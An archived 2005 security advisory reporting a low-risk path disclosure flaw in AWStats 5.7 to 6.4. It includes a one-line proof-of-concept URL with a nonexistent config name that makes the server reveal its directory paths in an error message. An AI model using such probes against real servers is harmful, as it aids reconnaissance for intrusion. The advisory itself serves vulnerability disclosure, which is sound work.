sile001adv.txt

sile001adv.txt: Posted Feb 26, 2005; Authored by Silentium | Site autistici.org; AWStats versions 5.7 to 6.4 have a path disclosure flaw.; tags | advisory; SHA-256 | 1f9e81c350624ec631794b3dafaf016be3236f2fb18f204f9f53ba37135d3ca0; Download | Favorite | View

sile001adv.txt

**************************************************************
* sile001 advisory                                           *
*                                                            * 
* PRODUCT: AWStats                                           *
* VERSION: 5.7 - 6.4                                         *
* VENDOR: http://awstats.sourceforge.net                     *
* VULNERABILITY: Path Disclosure                             * 
* RISK: Low                                                  *
*                                                            *
* Found by: Silentium of Anacron Group Italy                 *
*     date: 24/02/2005                                       *
*   e-mail: anacrongroupitaly[at]autistici[dot]org           *
*  my_home: http://www.autistici.org/anacron-group-italy     *
*                                                            *
**************************************************************


General product info
--------------------
AWStats (Advanced Web Statistics) is a powerful, full-featured web server
logfile analyzer which shows you all your Web statistics.
It works with IIS 5.0+, Apache and all major web, wap, proxy, streaming
server log files (and even ftp servers or mail logs) on all Operating Systems.
Current version is the 6.4.


General bug info
----------------
I have found a bug that show in error message the 
current path of http daemon.
For PoC you write how argument of variable 'config' an not exist
name refered at own config file.

Exploiting this bug
------------------- 
 
 Input in your browser:

 http://www.victim.com/cgi-bin/awstats.pl?config=silentium
 
 Output from web server:

 Error: Couldn't open config file "awstats.silentium.conf" nor "awstats.conf" 
 after searching in path "/var/www/cgi-bin,/etc/awstats,
 /usr/local/etc/awstats,/etc,/etc/opt/awstats": No such file or directory

 - Did you use the correct URL ?
 Example: http://localhost/awstats/awstats.pl?config=mysite
 Example: http://127.0.0.1/cgi-bin/awstats.pl?config=mysite
 - Did you create your config file 'awstats.silentium.conf' ?
 If not, you can run "/var/www/cgi-bin/tools/awstats_configure.pl"
 from command line, or create it manually.

 Check config file, permissions and AWStats documentation (in 'docs' directory).
   
                                 ---

You see the path of the web server:

 /var/www/cgi-bin


Patching this bug
-----------------
You search in source code the variable $config and trace it.

Top Authors In Last 30 Days

Red Hat 237 files
indoushka 172 files
Jay Turla 150 files
Ubuntu 78 files
h00die 54 files
juan vazquez 43 files
sinn3r 41 files
H D Moore 31 files
Karn Ganeshen 23 files
Pedro Ribeiro 22 files

File Archives

Systems

AIX (430)
Apple (2,114)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,124)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,567)
HPUX (881)
iOS (389)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (51,237)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (490)
RedHat (16,845)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (9,852)
UNIX (9,456)
UnixWare (188)
Windows (6,772)
Other

sile001adv.txt

sile001adv.txt

File Archive:

September 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

sile001adv.txt

Share This

sile001adv.txt

File Archive:

September 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems